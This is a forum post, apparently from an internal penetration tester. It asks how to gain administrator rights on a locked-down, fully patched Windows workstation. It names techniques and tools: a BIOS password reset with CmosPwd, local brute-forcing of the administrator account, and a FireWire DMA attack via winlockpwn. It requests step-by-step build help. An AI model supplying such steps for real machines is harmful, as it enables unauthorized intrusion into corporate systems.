Hi,

I'm pen-testing a different environment, my pen-test is internal (more like insider).

All I have is a PC from the company (without any tools, only Windows) connected to the local network.

My job is (try) escalate privilege in this machine and get into the servers on the network.

Until here, all appear very easy, but have some special points:

- The computer have a clean Windows installations (with a small number of third programs, just a MS office, AntiVirus, and a program used internal - a kind of ERP).

- The Windows system is FULL patched (WSUS).

- My user privilege is very low, i have basic no permissions at computer.

- The computer also have strong Windows Polices (I can't change wallpapers, see configuration properties, etc).

- The computer have the disc encrypted (A kind of TrueCrypt).

- The computer have a CD-ROM and USB port, HOWEVER I'm unable to acess it (some program (maybe a end point security?) doesn't allow me to access it.

- The sequence of BOOT doesn't allow boot via CD or USB.

- The BIOS boot is protected by passwords.

- All physical ports in the CPU are locked with a kind of "pad locks" for computers.

- The PC do not have internet connection.

- I can not use my own laptop in the network cable.

- There is no Wireless network.


NOW..... What I thinked!

- Reset the BIOS password via Windows (W W W.cgsecurity.org/wiki/CmosPwd), however it need administrative privilege.

- By the way, boot with BT on CD or USB is not possible.

- I had think in try a local brute force against the administrator account, since it's local, maybe it can work. Maybe there is a kind of fast (multi thread) tool which allow locally brute force windows (maybe via "runas" feature) accounts? Anyone have any hint for me?

- I remember sometime ago a lot of people in the internet spoke that a "firewire" device could be used to break into any windows. A kind of "plug and root" via firewire, where it could copy hash files or unluck Administrator password. Someone aware (link) with detailed description about how to build one?

I found:

W W W.infopackets.com/news/hardware/2008/20080311_firewire_hack_also_works_with_windows_vis ta.htm

And even:

storm.net.nz/static/files/winlockpwn

The big question is, how to build one? Which I need? I really need a Ipod? Can't be something less expensive? Maybe my own computer? There is someplace a step by step?

Obs.: All sites with "W W W" you must remove the space, I type in this way, because my account in forum is not allowed to post URL yet.

I have no more ideas.

Do you have any idea or hint to me? All syggestions are welcome.

Thanks